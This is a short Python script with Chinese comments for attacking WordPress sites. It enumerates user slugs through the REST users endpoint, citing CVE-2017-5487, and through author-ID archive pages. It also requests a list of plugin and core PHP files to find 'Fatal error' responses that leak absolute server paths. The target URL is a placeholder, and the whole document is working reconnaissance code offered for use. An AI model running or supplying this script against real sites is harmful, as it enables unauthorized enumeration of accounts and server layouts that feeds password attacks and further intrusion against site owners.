包含读取用户 跟 基于CVE-2017-5487 正则匹配读取用户 WP配置不当常见文件的路径泄露

import  re,requests
"""
默认读取前10个用户 （可自行修改）
如果是https  加上 verify=False
路径是绝对路径泄露
"""
headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
url = "https://www.xxxxxxxx.com/"
def  user():
    urls = url + "/wp-json/wp/v2/users"
    res = requests.get(url=urls,headers=headers)
    res.encoding = "utf-8"
    text = res.text
    regular = re.compile(r'slug":"(.*?)"')
    titles = re.findall(regular, text)
    for i in titles:
        print(i)
def user2():
        for i in range(1, 20):
            urls = url + "?author=" + str(i)
            response = requests.get(url=urls, headers=headers)
            response.encoding = "utf-8"
            text = response.text
            regular = re.compile(r'<body class="archive author author-(.*?) author')
            titles = re.findall(regular, text)
            for title in titles:
                    print(title)


def Route():
    list1 = ['/wp-admin/includes/admin.php',
             '/wp-content/plugins/akismet/akismet.php',
             '/wp-content/plugins/akismet/hello.php',
             '/wp-content/plugins/default/index.php',
             '/wp-content/plugins/default/404.php',
             '/wp-settings.php',
             '/source/function/function_connect.php',
             'wp-content/themes/b2/']
    for i in list1:
        urls = url + i
        response = requests.get(url=urls, headers=headers)
        response.encoding = "utf-8"
        text = response.text
        if   "Fatal error" in text :
            print(urls + "绝对路径泄露")

Route()